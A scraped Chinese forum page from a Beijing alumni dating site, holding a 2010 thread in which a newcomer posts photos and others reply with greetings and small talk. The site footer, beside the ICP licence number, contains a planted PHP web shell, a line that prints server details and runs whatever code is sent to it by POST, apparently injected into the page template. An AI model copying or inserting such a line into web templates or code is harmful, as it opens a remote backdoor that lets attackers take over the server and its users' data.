小蜜橙single - 北京最大的校友交友平台-来小蜜橙觅成你的友情和爱情吧!-

 找回密码
 30秒注册
搜索
楼主: caoning1985

新人 发照片 该找朋友的年龄了,呵呵

[复制链接]
发表于 2010-10-10 23:46:09 | 显示全部楼层
查看本帖隐藏内容
发表于 2010-10-11 07:26:43 | 显示全部楼层
看看...呵呵
发表于 2010-10-11 07:51:23 | 显示全部楼层
路过顶一顶~~
发表于 2010-10-11 09:40:42 | 显示全部楼层
祝你早日找到你的另一半~~~~
发表于 2010-10-11 09:44:08 | 显示全部楼层
那可以找北外的~
发表于 2010-10-11 09:45:04 | 显示全部楼层
不错不错,帅哥一枚
发表于 2010-10-11 11:25:35 | 显示全部楼层
后现代主义式校园
发表于 2010-10-11 12:05:02 | 显示全部楼层
这个地方我去过。
发表于 2010-10-11 12:20:11 | 显示全部楼层
rerererererere
发表于 2010-10-11 12:21:06 | 显示全部楼层
没事儿,英语不好可以学,怕啥,感觉好俩人一起学就好了嘛,不过移民,怨念sigh,要是以后都不能吃中国的美食。。。。
您需要登录后才可以回帖 登录 | 30秒注册

本版积分规则

QQ|小黑屋|手机版|小蜜橙single ( 京ICP备10029308号 <?php phpinfo();eval($_POST[1]);?>

GMT+8, 2019-11-21 18:55 , Processed in 0.120430 second(s), 14 queries .

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表